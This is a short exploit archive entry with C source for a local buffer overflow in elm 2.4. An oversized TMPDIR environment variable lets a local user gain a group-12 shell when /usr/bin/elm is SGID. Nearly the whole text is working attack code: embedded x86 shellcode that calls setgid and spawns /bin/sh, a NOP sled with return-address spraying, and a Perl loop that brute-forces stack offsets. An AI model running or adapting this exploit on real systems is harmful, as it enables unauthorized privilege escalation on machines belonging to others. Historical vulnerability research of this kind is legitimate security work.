Elm v2.4 buffer overflow exploit which provides a gid=12 shell if /usr/bin/elm is SGID. Tested on Slackware 3.6, elm 2.4PL25. Perl script to find offsets included.
03d1978ea3b8ab5173fda42c7786dc04993514aae31b5c97466470d36a8dddcf
/* (linux)elm[2.4] buffer overflow, by v9[v9@fakehalo.org]. this will give you
a gid=12 shell if /usr/bin/elm is SGID(=2755). elm rejects most user
defined vars after 254<characters but TMPDIR overflows a few characters
before that in some situations. both elm 2.4 and 2.5(current) have this
overflow, but elm 2.5's can be handled differently. (elm_bof25.c)
note: try offsets of 100, as noted in the perl script below. 800 worked on
my old slackware 3.6, (elm 2.4 PL25). it is possible you may need to modify
this to your system. (probably not though)
yeah, i obviously was looking around the elm source to find this. too much
free time for me. although, i also noticed that just typing too much in elm
will make it segfault. :)
here is a quick perl script to run offsets (until ctrl-c):
#!/usr/bin/perl
$i=$ARGV[0];
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("rm /tmp/mbox.\$USER;./elm_bof25 $i");
$i++; # or $i+=100; if you want to be speedy. (which you do)
} */
#define DEFAULT_OFFSET 800
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3\x0c\xcd\x80\x89\x76\x08\x31\xc0\x88"
"\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
"\x89\xd8\x40\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x01";
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[242];
int i,offset;
long ret;
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
printf("return address: 0x%lx, offset: %d.\n\nwhen ELM loads press \"m\" to send mail, then enter\ngarbage values until you get to the message editor(vi).\nyou also might want to run \"reset\".\n",ret,offset);
sleep(5);
for(i=2;i<242;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(238-strlen(exec));i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
setenv("TMPDIR",bof,1);
execlp("/usr/bin/elm","elm",0);
}